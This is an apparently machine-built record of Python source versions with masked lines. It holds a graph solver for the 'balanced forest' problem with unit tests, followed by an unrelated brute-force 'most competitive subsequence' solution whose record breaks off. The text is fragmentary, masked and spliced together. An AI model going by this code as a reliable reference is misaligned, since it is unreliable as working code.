"step-3": "<mask token>\n\n\nclass Node(object):\n \"\"\"docstring for Node\"\"\"\n\n def __init__(self, value, indentifier):\n super(Node, self).__init__()\n self.value = value\n self.identifier = indentifier\n self.next = None\n\n\nclass Graph(object):\n \"\"\"docstring for Graph\"\"\"\n\n def __init__(self, values, edges):\n super(Graph, self).__init__()\n self.node_values = values\n self.vertices = len(values)\n self.edges = edges\n self.graph = [None] * self.vertices\n self.grand_sum = sum(self.node_values)\n\n def build_adjacency_list(self):\n for edge in self.edges:\n fro = edge[0] - 1\n to = edge[1] - 1\n node = Node(self.node_values[to], to)\n node.next = self.graph[fro]\n self.graph[fro] = node\n node = Node(self.node_values[fro], fro)\n node.next = self.graph[to]\n self.graph[to] = node\n\n def print_graph(self):\n for i in range(self.vertices):\n node = self.graph[i]\n print('Vertex:', i)\n while node != None:\n print(node.value, node.identifier)\n node = node.next\n print('<<' * 20)\n\n def get_tree_nodes(self, start_node, nodes, edge, total):\n if start_node == None:\n return nodes\n while start_node != None:\n if start_node.identifier == edge[0\n ] or start_node.identifier == edge[2\n ] or start_node.identifier in nodes:\n print('skipping ', start_node.identifier)\n else:\n print('adding ', start_node.identifier)\n nodes.append(start_node.identifier)\n total[0] += start_node.value\n next_n = self.graph[start_node.identifier]\n self.get_tree_nodes(next_n, nodes, edge, total)\n start_node = start_node.next\n return nodes\n\n def split_and_compute_tree_sum(self, t1_nodes=[], t2_nodes=[], edge=[],\n ton=False):\n t1_total = 0\n t2_total = 0\n total = [0]\n start_node = self.graph[edge[1]]\n if start_node.next != None:\n t2_nodes = self.get_tree_nodes(start_node, t2_nodes, edge, total)\n if len(t2_nodes) == 0 and edge[1] != edge[2]:\n t2_nodes.append(edge[1])\n total[0] += self.node_values[edge[1]]\n t2_total = total[0]\n if not ton and t2_total < self.grand_sum / 2:\n for i in range(self.vertices):\n if i not in t2_nodes:\n t1_nodes.append(i)\n t1_total = self.grand_sum - t2_total\n print('t2_nodes', t2_nodes)\n print('t2_total', t2_total)\n return t1_total, t2_total\n\n def check(self, tree1_total, tree2_total, tree3_total):\n print('###' * 10)\n print('FINAL tree1_total: ', tree1_total)\n print('FINAL tree2_total: ', tree2_total)\n print('FINAL tree3_total: ', tree3_total)\n print('###' * 10)\n if (tree1_total == tree2_total or tree1_total == tree3_total or \n tree2_total == tree3_total):\n mx = max(tree1_total, tree2_total, tree3_total)\n if [tree1_total, tree2_total, tree3_total].count(mx) >= 2:\n ret = mx - min(tree1_total, tree2_total, tree3_total)\n return ret, True\n return -1, False\n\n def split_tree_into_two(self):\n ret = -1\n found = False\n global skipped\n for entry in range(self.vertices):\n tree1_nodes = []\n tree2_nodes = []\n tree3_nodes = []\n temp_nodes = []\n n = self.graph[entry]\n while n != None:\n edge = [entry, n.identifier, -1]\n if n.identifier <= entry:\n n = n.next\n skipped += 1\n continue\n print('##MAIN##. 
SPLIT POINT EDGE: ', edge)\n tree1_nodes = []\n tree2_nodes = []\n tree1_total, tree2_total = self.split_and_compute_tree_sum(\n tree1_nodes, tree2_nodes, edge)\n print('ORIGINALS: ', tree1_total, tree2_total)\n if min(tree1_total, tree2_total) < self.grand_sum / 3 or max(\n tree1_total, tree2_total) > 2 * self.grand_sum / 3:\n n = n.next\n continue\n if tree1_total > tree2_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree1_nodes, 1, edge[1])\n elif tree2_total > tree1_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree2_nodes, 2, edge[0])\n elif tree1_total == tree2_total:\n ret = tree1_total\n found = True\n else:\n found = True\n if found:\n break\n n = n.next\n if found:\n break\n return ret\n\n def find_third_tree(self, tree1_total, tree2_total, nodes, t=1, m=0):\n ret, found = -1, False\n global skipped\n consumed = []\n for i in range(len(nodes)):\n skip_n = nodes[i]\n consumed.append(skip_n)\n n = self.graph[skip_n]\n while n != None:\n if n.identifier in consumed:\n n = n.next\n skipped += 1\n continue\n edge = [skip_n, n.identifier, m]\n print('2. SPLIT POINT EDGE: ', edge)\n print('tree1_total', tree1_total)\n tree3_nodes = []\n temp_nodes = []\n _, tree3_total = self.split_and_compute_tree_sum(temp_nodes,\n tree3_nodes, edge, True)\n if t == 1:\n ret, found = self.check(tree1_total - tree3_total,\n tree2_total, tree3_total)\n elif t == 2:\n ret, found = self.check(tree1_total, tree2_total -\n tree3_total, tree3_total)\n if found:\n break\n n = n.next\n if found:\n break\n return ret, found\n\n\ndef balancedForest(values, edges):\n mygraph = Graph(values, edges)\n mygraph.build_adjacency_list()\n mygraph.print_graph()\n return mygraph.split_tree_into_two()\n\n\n<mask token>\n\n\nclass BalancedForestTest(unittest.TestCase):\n\n def test1(self):\n expected = 10\n c = [1, 1, 1, 18, 10, 11, 5, 6]\n edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test2(self):\n expected = 13\n c = [12, 7, 11, 17, 20, 10]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test3(self):\n expected = 19\n c = [15, 12, 8, 14, 13]\n edges = [[4, 5], [1, 2], [1, 3], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test4(self):\n expected = 2\n c = [1, 2, 2, 1, 1]\n edges = [[1, 2], [1, 3], [3, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test5(self):\n expected = -1\n c = [1, 3, 5]\n edges = [[1, 3], [1, 2]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test6(self):\n expected = -1\n c = [7, 7, 4, 1, 1, 1]\n edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test7(self):\n expected = 0\n c = [1, 3, 4, 4]\n edges = [(1, 2), (1, 3), (1, 4)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test8(self):\n expected = 297\n c = [100, 99, 98, 100, 99, 98]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test9(self):\n expected = 4\n c = [12, 10, 8, 12, 14, 12]\n edges = [[1, 2], [1, 3], [1, 4], [2, 5], [4, 6]]\n self.assertEqual(balancedForest(c, edges), expected)\n print('SKIPPED', skipped)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Node(object):\n \"\"\"docstring for Node\"\"\"\n\n def __init__(self, value, indentifier):\n super(Node, self).__init__()\n self.value = value\n self.identifier = indentifier\n self.next = None\n\n\nclass Graph(object):\n \"\"\"docstring for Graph\"\"\"\n\n def __init__(self, values, edges):\n super(Graph, self).__init__()\n self.node_values = values\n self.vertices = len(values)\n self.edges = edges\n self.graph = [None] * self.vertices\n self.grand_sum = sum(self.node_values)\n\n def build_adjacency_list(self):\n for edge in self.edges:\n fro = edge[0] - 1\n to = edge[1] - 1\n node = Node(self.node_values[to], to)\n node.next = self.graph[fro]\n self.graph[fro] = node\n node = Node(self.node_values[fro], fro)\n node.next = self.graph[to]\n self.graph[to] = node\n\n def print_graph(self):\n for i in range(self.vertices):\n node = self.graph[i]\n print('Vertex:', i)\n while node != None:\n print(node.value, node.identifier)\n node = node.next\n print('<<' * 20)\n\n def get_tree_nodes(self, start_node, nodes, edge, total):\n if start_node == None:\n return nodes\n while start_node != None:\n if start_node.identifier == edge[0\n ] or start_node.identifier == edge[2\n ] or start_node.identifier in nodes:\n print('skipping ', start_node.identifier)\n else:\n print('adding ', start_node.identifier)\n nodes.append(start_node.identifier)\n total[0] += start_node.value\n next_n = self.graph[start_node.identifier]\n self.get_tree_nodes(next_n, nodes, edge, total)\n start_node = start_node.next\n return nodes\n\n def split_and_compute_tree_sum(self, t1_nodes=[], t2_nodes=[], edge=[],\n ton=False):\n t1_total = 0\n t2_total = 0\n total = [0]\n start_node = self.graph[edge[1]]\n if start_node.next != None:\n t2_nodes = self.get_tree_nodes(start_node, t2_nodes, edge, total)\n if len(t2_nodes) == 0 and edge[1] != edge[2]:\n t2_nodes.append(edge[1])\n total[0] += self.node_values[edge[1]]\n t2_total = total[0]\n if not ton and t2_total < self.grand_sum / 2:\n for i in range(self.vertices):\n if i not in t2_nodes:\n t1_nodes.append(i)\n t1_total = self.grand_sum - t2_total\n print('t2_nodes', t2_nodes)\n print('t2_total', t2_total)\n return t1_total, t2_total\n\n def check(self, tree1_total, tree2_total, tree3_total):\n print('###' * 10)\n print('FINAL tree1_total: ', tree1_total)\n print('FINAL tree2_total: ', tree2_total)\n print('FINAL tree3_total: ', tree3_total)\n print('###' * 10)\n if (tree1_total == tree2_total or tree1_total == tree3_total or \n tree2_total == tree3_total):\n mx = max(tree1_total, tree2_total, tree3_total)\n if [tree1_total, tree2_total, tree3_total].count(mx) >= 2:\n ret = mx - min(tree1_total, tree2_total, tree3_total)\n return ret, True\n return -1, False\n\n def split_tree_into_two(self):\n ret = -1\n found = False\n global skipped\n for entry in range(self.vertices):\n tree1_nodes = []\n tree2_nodes = []\n tree3_nodes = []\n temp_nodes = []\n n = self.graph[entry]\n while n != None:\n edge = [entry, n.identifier, -1]\n if n.identifier <= entry:\n n = n.next\n skipped += 1\n continue\n print('##MAIN##. 
SPLIT POINT EDGE: ', edge)\n tree1_nodes = []\n tree2_nodes = []\n tree1_total, tree2_total = self.split_and_compute_tree_sum(\n tree1_nodes, tree2_nodes, edge)\n print('ORIGINALS: ', tree1_total, tree2_total)\n if min(tree1_total, tree2_total) < self.grand_sum / 3 or max(\n tree1_total, tree2_total) > 2 * self.grand_sum / 3:\n n = n.next\n continue\n if tree1_total > tree2_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree1_nodes, 1, edge[1])\n elif tree2_total > tree1_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree2_nodes, 2, edge[0])\n elif tree1_total == tree2_total:\n ret = tree1_total\n found = True\n else:\n found = True\n if found:\n break\n n = n.next\n if found:\n break\n return ret\n\n def find_third_tree(self, tree1_total, tree2_total, nodes, t=1, m=0):\n ret, found = -1, False\n global skipped\n consumed = []\n for i in range(len(nodes)):\n skip_n = nodes[i]\n consumed.append(skip_n)\n n = self.graph[skip_n]\n while n != None:\n if n.identifier in consumed:\n n = n.next\n skipped += 1\n continue\n edge = [skip_n, n.identifier, m]\n print('2. SPLIT POINT EDGE: ', edge)\n print('tree1_total', tree1_total)\n tree3_nodes = []\n temp_nodes = []\n _, tree3_total = self.split_and_compute_tree_sum(temp_nodes,\n tree3_nodes, edge, True)\n if t == 1:\n ret, found = self.check(tree1_total - tree3_total,\n tree2_total, tree3_total)\n elif t == 2:\n ret, found = self.check(tree1_total, tree2_total -\n tree3_total, tree3_total)\n if found:\n break\n n = n.next\n if found:\n break\n return ret, found\n\n\ndef balancedForest(values, edges):\n mygraph = Graph(values, edges)\n mygraph.build_adjacency_list()\n mygraph.print_graph()\n return mygraph.split_tree_into_two()\n\n\n<mask token>\n\n\nclass BalancedForestTest(unittest.TestCase):\n\n def test1(self):\n expected = 10\n c = [1, 1, 1, 18, 10, 11, 5, 6]\n edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test2(self):\n expected = 13\n c = [12, 7, 11, 17, 20, 10]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test3(self):\n expected = 19\n c = [15, 12, 8, 14, 13]\n edges = [[4, 5], [1, 2], [1, 3], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test4(self):\n expected = 2\n c = [1, 2, 2, 1, 1]\n edges = [[1, 2], [1, 3], [3, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test5(self):\n expected = -1\n c = [1, 3, 5]\n edges = [[1, 3], [1, 2]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test6(self):\n expected = -1\n c = [7, 7, 4, 1, 1, 1]\n edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test7(self):\n expected = 0\n c = [1, 3, 4, 4]\n edges = [(1, 2), (1, 3), (1, 4)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test8(self):\n expected = 297\n c = [100, 99, 98, 100, 99, 98]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test9(self):\n expected = 4\n c = [12, 10, 8, 12, 14, 12]\n edges = [[1, 2], [1, 3], [1, 4], [2, 5], [4, 6]]\n self.assertEqual(balancedForest(c, edges), expected)\n print('SKIPPED', skipped)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "skipped = 0\n\nclass Node(object):\n \"\"\"docstring for Node\"\"\"\n def __init__(self, value, indentifier):\n super(Node, self).__init__()\n self.value = value\n self.identifier = indentifier\n self.next = None\n\n\nclass Graph(object):\n \"\"\"docstring for Graph\"\"\"\n def __init__(self, values, edges):\n super(Graph, self).__init__()\n self.node_values = values\n self.vertices = len(values)\n self.edges = edges\n self.graph = [None] * self.vertices\n # self.edges.sort()\n self.grand_sum = sum(self.node_values)\n\n def build_adjacency_list(self):\n for edge in self.edges:\n fro = edge[0] - 1\n to = edge[1]- 1\n\n # Adding the node to the source node\n node = Node(self.node_values[to], to)\n node.next = self.graph[fro]\n self.graph[fro] = node\n\n # Adding the source node to the destination as \n # it is the undirected graph \n node = Node(self.node_values[fro], fro)\n node.next = self.graph[to]\n self.graph[to] = node\n\n \n def print_graph(self):\n for i in range(self.vertices):\n node = self.graph[i]\n print(\"Vertex:\", i)\n while(node!=None):\n print(node.value, node.identifier)\n node = node.next\n print(\"<<\"*20)\n\n def get_tree_nodes(self, start_node, nodes, edge, total):\n\n if(start_node==None):\n return nodes\n\n while(start_node!=None):\n if(start_node.identifier==edge[0] or start_node.identifier==edge[2] or (start_node.identifier in nodes)):\n print(\"skipping \", start_node.identifier)\n else:\n print(\"adding \", start_node.identifier)\n nodes.append(start_node.identifier)\n total[0] += start_node.value\n next_n = self.graph[start_node.identifier]\n self.get_tree_nodes(next_n, nodes, edge, total)\n start_node = start_node.next\n return nodes\n\n\n def split_and_compute_tree_sum(self, t1_nodes = [], t2_nodes = [], edge=[], ton = False):\n t1_total = 0\n t2_total = 0\n total = [0]\n \n start_node = self.graph[edge[1]]\n if(start_node.next != None):\n t2_nodes = self.get_tree_nodes(start_node, t2_nodes, edge, total)\n\n if(len(t2_nodes)==0 and edge[1]!=edge[2]):\n t2_nodes.append(edge[1])\n total[0] += self.node_values[edge[1]]\n\n t2_total = total[0]\n if(not ton and t2_total < self.grand_sum/2):\n for i in range(self.vertices):\n if(i not in t2_nodes):\n t1_nodes.append(i)\n\n t1_total = self.grand_sum - t2_total\n\n print(\"t2_nodes\", t2_nodes)\n print(\"t2_total\", t2_total)\n\n return t1_total, t2_total\n\n\n def check(self, tree1_total, tree2_total, tree3_total):\n print(\"###\"*10)\n print(\"FINAL tree1_total: \", tree1_total)\n print(\"FINAL tree2_total: \", tree2_total)\n print(\"FINAL tree3_total: \", tree3_total)\n print(\"###\"*10)\n\n if (tree1_total == tree2_total) or (tree1_total == tree3_total) or (tree2_total == tree3_total):\n mx = max(tree1_total, tree2_total, tree3_total)\n if([tree1_total, tree2_total, tree3_total].count(mx) >= 2):\n ret = mx - min(tree1_total, tree2_total, tree3_total)\n return ret, True\n return -1, False\n\n def split_tree_into_two(self):\n ret = -1\n found = False\n global skipped\n\n for entry in range(self.vertices):\n tree1_nodes = []\n tree2_nodes = []\n tree3_nodes = []\n temp_nodes = []\n\n n = self.graph[entry]\n while(n!=None):\n edge = [entry, n.identifier, -1]\n if(n.identifier <= entry):\n n = n.next\n skipped += 1\n continue\n print(\"##MAIN##. 
SPLIT POINT EDGE: \", edge)\n tree1_nodes = []\n tree2_nodes = []\n tree1_total, tree2_total = self.split_and_compute_tree_sum(tree1_nodes, tree2_nodes, edge)\n print(\"ORIGINALS: \", tree1_total, tree2_total)\n if(min(tree1_total, tree2_total) < self.grand_sum/3 or (max(tree1_total, tree2_total) > (2*self.grand_sum)/3)):\n n = n.next\n continue\n\n if(tree1_total > tree2_total):\n ret, found = self.find_third_tree(tree1_total, tree2_total,tree1_nodes, 1, edge[1])\n elif(tree2_total > tree1_total):\n ret, found = self.find_third_tree(tree1_total, tree2_total,tree2_nodes, 2, edge[0])\n elif (tree1_total == tree2_total):\n ret = tree1_total\n found = True\n else:\n found = True\n if(found):\n break\n n = n.next\n if(found):\n break\n return ret\n\n\n def find_third_tree(self, tree1_total, tree2_total, nodes, t = 1, m=0):\n\n ret , found = -1, False\n global skipped\n consumed = []\n\n for i in range(len(nodes)):\n skip_n = nodes[i]\n consumed.append(skip_n)\n n = self.graph[skip_n]\n while(n!=None):\n if(n.identifier in consumed):\n n = n.next\n skipped += 1\n continue\n edge = [skip_n, n.identifier, m]\n print(\"2. SPLIT POINT EDGE: \", edge)\n print(\"tree1_total\",tree1_total)\n tree3_nodes = []\n temp_nodes = []\n _,tree3_total = self.split_and_compute_tree_sum(temp_nodes, tree3_nodes, edge, True)\n if(t==1):\n ret , found = self.check(tree1_total - tree3_total, tree2_total, tree3_total)\n elif(t==2):\n ret , found = self.check(tree1_total, tree2_total - tree3_total, tree3_total)\n if(found):\n break\n n = n.next\n if(found):\n break\n\n return ret, found\n\n\ndef balancedForest(values, edges):\n mygraph = Graph(values, edges)\n mygraph.build_adjacency_list()\n mygraph.print_graph()\n return mygraph.split_tree_into_two()\n\nimport unittest\n\nclass BalancedForestTest(unittest.TestCase):\n def test1(self):\n expected = 10\n c = [1, 1, 1, 18, 10, 11, 5, 6]\n edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test2(self):\n expected = 13\n c = [12, 7, 11, 17, 20, 10]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test3(self):\n expected = 19\n c = [15, 12, 8, 14, 13]\n edges = [[4,5],[1,2],[1,3],[1,4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test4(self):\n expected = 2\n c = [1,2,2,1,1]\n edges = [[1,2],[1,3],[3,5],[1,4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test5(self):\n expected = -1\n c = [1,3,5]\n edges = [[1,3],[1,2]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test6(self):\n expected = -1\n c = [7, 7, 4, 1, 1, 1]\n edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test7(self):\n expected = 0\n c = [1, 3, 4, 4]\n edges = [(1, 2), (1, 3), (1, 4)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test8(self):\n expected = 297\n c = [100, 99, 98, 100, 99, 98]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test9(self):\n expected = 4\n c = [12, 10, 8, 12, 14, 12]\n edges = [[1, 2], [1, 3], [1, 4], [2, 5], [4, 6]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n print(\"SKIPPED\", skipped)\n\n\nif __name__ == '__main__':\n unittest.main()",
"step-ids": [
7,
22,
24,
25,
28
]
}
|
[
7,
22,
24,
25,
28
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
__version__ = '1.1.3rc0'
|
flexible
|
{
"blob_id": "2e5bbc8c6a5eac2ed71c5d8619bedde2e04ee9a6",
"index": 4932,
"step-1": "<mask token>\n",
"step-2": "__version__ = '1.1.3rc0'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
'''
Given []int, the mostCompetitive subsequence is
a sublist of nums.
So we calculate a score: ∀ x ∈ nums, score += x_n - x_(n-1).
You can remove as many elements as you need to.
What is the mostCompetitive subsequence that you can come up with?
[1,3,5]
[1,3,4] ← More competitive
[1,2,5] ← More competitive
[1,3,4]
This is true b/c we evaluate on the first point where the two differ.
1) We care about creating lists whose numbers are as small as
possible. The numbers don't need to be in order, they just need to be
small.
We care about every number s.t. enough elements remain after it to
complete a subsequence of length k or more.
Get all possible sub-sequences, with length k or more. If more than k,
iterate through how we can remove the largest elements.
We should also keep track of the smallest number that corresponds to a valid
sequence?
I'm leaning towards a brute force method.
1) Find all sequences of length k. Store the most competitive.
So we should write a function that compares two sequences to see which is more
competitive.
Do one run, with subsequence == k.
Then try to beat that run.
Keep track of what the 'winning' subsequence is, and
iterate through possible values.
So two iterations.
[2,4,3,3,5,4,9,6] | k = 4
( )
ans = 2,4,3,3
[2,4,3,3,5,4,9,6] | k = 4
( )
2,4,3,3
^
idx = 0
Once we have 'beaten' it, out of the remaining
elements, remove the max element until length of
sublist is workable.
[2, 3, 3, ]
1) Write isMoreCompetitive
2) First pass → get most competitive with sliding window len = k
3) Second and later passes. If we make a change ('win'), re-run. If a
   re-run produces no change, we are done.
'''
'''
To Review:
def mostCompetitive(self, nums, k):
to_remove = len(nums) - k
stack = []
for x in nums:
while stack and x < stack[-1] and to_remove:
to_remove -= 1
stack.pop()
stack.append(x)
for _ in range(to_remove):
stack.pop()
return stack
'''
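
# A minimal runnable sketch of the stack-based approach quoted in the
# review notes above -- an O(n) alternative to the exhaustive search
# below. The standalone name `most_competitive_stack` is ours, added
# here for illustration only.
def most_competitive_stack(nums, k):
    to_remove = len(nums) - k  # how many elements we may still drop
    stack = []
    for x in nums:
        # pop while the current value improves on the stack top and
        # we are still allowed to drop elements
        while stack and x < stack[-1] and to_remove:
            stack.pop()
            to_remove -= 1
        stack.append(x)
    return stack[:k]  # trim any tail we never got to drop

# e.g. most_competitive_stack([2, 4, 3, 3, 5, 4, 9, 6], 4) == [2, 3, 3, 4]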
class Solution:
    # is `a` more competitive than `b`? (compared at the first index
    # where they differ)
    def isMoreCompetitive(self, a, b):
        if len(a) != len(b):
            print("Error: len()s do not match")
return "Error"
for i in range(len(a)):
if a[i] == b[i]:
continue
elif a[i] < b[i]:
return True
else:
return False
return False
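
    # e.g. isMoreCompetitive([1, 2, 5], [1, 3, 4]) -> True: the sequences
    # first differ at index 1, where 2 < 3. Identical sequences return False.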
def refined(self, nums, i, a, ans):
if i >= len(nums):
            if len(a) == len(ans) and not self.isMoreCompetitive(a, ans):
return False, None
elif len(a) != len(ans):
return False, None
else:
return True, a
        elif i < len(nums) and len(ans) - len(a) <= len(nums) - i:
boolA, respA = self.refined(nums, i+1, a+[nums[i]], ans)
boolB, respB = self.refined(nums, i+1, a, ans)
if boolA == True and boolB == True:
if self.isMoreCompetitive(respA, respB):
return True, respA
else:
return True, respB
elif boolA == True:
return boolA, respA
elif boolB == True:
return True, respB
else:
return False, None
else:
return False, None
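
    # NOTE: refined() enumerates include/exclude choices for every element
    # (O(2^n) worst case) with only a feasibility prune, so it is practical
    # only for small inputs.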
def mostCompetitive(self, nums, k):
        if len(nums) < k:
print("length mismatch @ init")
return False
ans = list(nums[0:k])
tmp = list(nums[0:k])
i = k
# Initial pass
while i < len(nums):
# print(tmp)
del tmp[0]
# print(tmp)
tmp.append(nums[i])
# print(tmp)
if self.isMoreCompetitive(tmp, ans):
ans = list(tmp)
i += 1
# print("ans: {}, tmp:{}".format(ans, tmp))
# print("")
        # Pass 2: exhaustively search for an equally long, more
        # competitive subsequence of the whole array
foundAnswer, updateAns = self.refined(nums, 0, [], ans)
if foundAnswer == True:
return updateAns
return ans
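
# Expected results for the demo below, under the "most competitive
# subsequence" semantics described in the notes above:
#   mostCompetitive([3, 5, 2, 6], 2)              -> [2, 6]
#   mostCompetitive([2, 4, 3, 3, 5, 4, 9, 6], 4)  -> [2, 3, 3, 4]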
if __name__ == '__main__':
s = Solution()
print(s.mostCompetitive([3,5,2,6], 2))
print(s.mostCompetitive([2,4,3,3,5,4,9,6], 4))
print(s.mostCompetitive([84,10,71,23,66,61,62,64,34,41,80,25,91,43,4,75,65,13,37,41,46,90,55,8,85,61,95,71], 24))
print(s.mostCompetitive([2,4,3,3,5,4,9,6], 4))
    # unused scratch test case (nums and k = 18):
    # [11,52,57,91,47,95,86,46,87,47,70,56,54,61,89,44,3,73,1,7,87,48,17,25,49,54,6,72,97,62,16,11,47,34,68,58,14,36,46,65,2,15]
    # 18
|
normal
|
{
"blob_id": "f8b04f374e1c55d4985be793939f0ff9393c29e0",
"index": 2571,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n def refined(self, nums, i, a, ans):\n if i >= len(nums):\n if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:\n return False, None\n elif len(a) != len(ans):\n return False, None\n else:\n return True, a\n elif i < len(nums) and len(ans) - len(a) <= len(nums) - i:\n boolA, respA = self.refined(nums, i + 1, a + [nums[i]], ans)\n boolB, respB = self.refined(nums, i + 1, a, ans)\n if boolA == True and boolB == True:\n if self.isMoreCompetitive(respA, respB):\n return True, respA\n else:\n return True, respB\n elif boolA == True:\n return boolA, respA\n elif boolB == True:\n return True, respB\n else:\n return False, None\n else:\n return False, None\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def isMoreCompetitive(self, a, b):\n if len(a) != len(b):\n print(\"Error, len()'s do not match'\")\n return 'Error'\n for i in range(len(a)):\n if a[i] == b[i]:\n continue\n elif a[i] < b[i]:\n return True\n else:\n return False\n return False\n\n def refined(self, nums, i, a, ans):\n if i >= len(nums):\n if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:\n return False, None\n elif len(a) != len(ans):\n return False, None\n else:\n return True, a\n elif i < len(nums) and len(ans) - len(a) <= len(nums) - i:\n boolA, respA = self.refined(nums, i + 1, a + [nums[i]], ans)\n boolB, respB = self.refined(nums, i + 1, a, ans)\n if boolA == True and boolB == True:\n if self.isMoreCompetitive(respA, respB):\n return True, respA\n else:\n return True, respB\n elif boolA == True:\n return boolA, respA\n elif boolB == True:\n return True, respB\n else:\n return False, None\n else:\n return False, None\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def isMoreCompetitive(self, a, b):\n if len(a) != len(b):\n print(\"Error, len()'s do not match'\")\n return 'Error'\n for i in range(len(a)):\n if a[i] == b[i]:\n continue\n elif a[i] < b[i]:\n return True\n else:\n return False\n return False\n\n def refined(self, nums, i, a, ans):\n if i >= len(nums):\n if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:\n return False, None\n elif len(a) != len(ans):\n return False, None\n else:\n return True, a\n elif i < len(nums) and len(ans) - len(a) <= len(nums) - i:\n boolA, respA = self.refined(nums, i + 1, a + [nums[i]], ans)\n boolB, respB = self.refined(nums, i + 1, a, ans)\n if boolA == True and boolB == True:\n if self.isMoreCompetitive(respA, respB):\n return True, respA\n else:\n return True, respB\n elif boolA == True:\n return boolA, respA\n elif boolB == True:\n return True, respB\n else:\n return False, None\n else:\n return False, None\n\n def mostCompetitive(self, nums, k):\n if len(nums) < k:\n print('length mismatch @ init')\n return False\n ans = list(nums[0:k])\n tmp = list(nums[0:k])\n i = k\n while i < len(nums):\n del tmp[0]\n tmp.append(nums[i])\n if self.isMoreCompetitive(tmp, ans):\n ans = list(tmp)\n i += 1\n shouldContinue = True\n idx = 0\n foundAnswer, updateAns = self.refined(nums, 0, [], ans)\n if foundAnswer == True:\n return updateAns\n return ans\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def isMoreCompetitive(self, a, b):\n if len(a) != len(b):\n print(\"Error, len()'s do not match'\")\n return 'Error'\n for i in range(len(a)):\n if a[i] == b[i]:\n continue\n elif a[i] < b[i]:\n return True\n else:\n return False\n return False\n\n def refined(self, nums, i, a, ans):\n if i >= len(nums):\n if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:\n return False, None\n elif len(a) != len(ans):\n return False, None\n else:\n return True, a\n elif i < len(nums) and len(ans) - len(a) <= len(nums) - i:\n boolA, respA = self.refined(nums, i + 1, a + [nums[i]], ans)\n boolB, respB = self.refined(nums, i + 1, a, ans)\n if boolA == True and boolB == True:\n if self.isMoreCompetitive(respA, respB):\n return True, respA\n else:\n return True, respB\n elif boolA == True:\n return boolA, respA\n elif boolB == True:\n return True, respB\n else:\n return False, None\n else:\n return False, None\n\n def mostCompetitive(self, nums, k):\n if len(nums) < k:\n print('length mismatch @ init')\n return False\n ans = list(nums[0:k])\n tmp = list(nums[0:k])\n i = k\n while i < len(nums):\n del tmp[0]\n tmp.append(nums[i])\n if self.isMoreCompetitive(tmp, ans):\n ans = list(tmp)\n i += 1\n shouldContinue = True\n idx = 0\n foundAnswer, updateAns = self.refined(nums, 0, [], ans)\n if foundAnswer == True:\n return updateAns\n return ans\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.mostCompetitive([3, 5, 2, 6], 2))\n print(s.mostCompetitive([2, 4, 3, 3, 5, 4, 9, 6], 4))\n print(s.mostCompetitive([84, 10, 71, 23, 66, 61, 62, 64, 34, 41, 80, 25,\n 91, 43, 4, 75, 65, 13, 37, 41, 46, 90, 55, 8, 85, 61, 95, 71], 24))\n print(s.mostCompetitive([2, 4, 3, 3, 5, 4, 9, 6], 4))\n [11, 52, 57, 91, 47, 95, 86, 46, 87, 47, 70, 56, 54, 61, 89, 44, 3, 73,\n 1, 7, 87, 48, 17, 25, 49, 54, 6, 72, 97, 62, 16, 11, 47, 34, 68, 58,\n 14, 36, 46, 65, 2, 15]\n18\n",
